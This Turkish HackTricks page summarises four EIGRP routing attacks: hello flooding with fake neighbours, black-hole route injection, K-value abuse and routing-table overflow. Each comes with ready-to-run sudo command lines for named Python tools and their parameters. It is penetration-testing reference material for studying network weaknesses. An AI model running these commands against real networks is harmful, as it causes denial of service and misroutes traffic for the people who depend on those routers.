EIGRP Saldırıları

Reading time: 2 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

Bu, https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 açıklanan saldırıların bir özetidir. Daha fazla bilgi için kontrol edin.

Sahte EIGRP Komşuları Saldırısı

  • Amaç: EIGRP hello paketleriyle yönlendirici CPU'larını aşırı yükleyerek Hizmet Reddi (DoS) saldırısına yol açmak.
  • Araç: helloflooding.py scripti.
  • Uygulama: %%%bash ~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24 %%%
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir, örneğin eth0.
  • --as: EIGRP otonom sistem numarasını tanımlar, örneğin 1.
  • --subnet: Alt ağ konumunu ayarlar, örneğin 10.10.100.0/24.

EIGRP Kara Delik Saldırısı

  • Amaç: Yanlış bir rota enjekte ederek ağ trafiği akışını kesintiye uğratmak, trafiğin var olmayan bir hedefe yönlendirilmesine neden olmak.
  • Araç: routeinject.py scripti.
  • Uygulama: %%%bash ~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32 %%%
  • Parametreler:
  • --interface: Saldırganın sistem arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Saldırganın IP adresini ayarlar.
  • --dst: Hedef alt ağ IP'sini ayarlar.
  • --prefix: Hedef alt ağ IP'sinin maskesini tanımlar.

K-Değerlerini Kötüye Kullanma Saldırısı

  • Amaç: Değiştirilmiş K-değerlerini enjekte ederek EIGRP alanında sürekli kesintiler ve yeniden bağlantılar oluşturmak, bu da etkili bir DoS saldırısına yol açar.
  • Araç: relationshipnightmare.py scripti.
  • Uygulama: %%%bash ~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100 %%%
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Meşru bir yönlendiricinin IP adresini ayarlar.

Yönlendirme Tablosu Taşması Saldırısı

  • Amaç: Yönlendirme tablosunu sayısız yanlış rota ile doldurarak yönlendiricinin CPU ve RAM'ini zorlamak.
  • Araç: routingtableoverflow.py scripti.
  • Uygulama: %%%bash sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50 %%%
  • Parametreler:
  • --interface: Ağ arayüzünü belirtir.
  • --as: EIGRP AS numarasını tanımlar.
  • --src: Saldırganın IP adresini ayarlar.

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin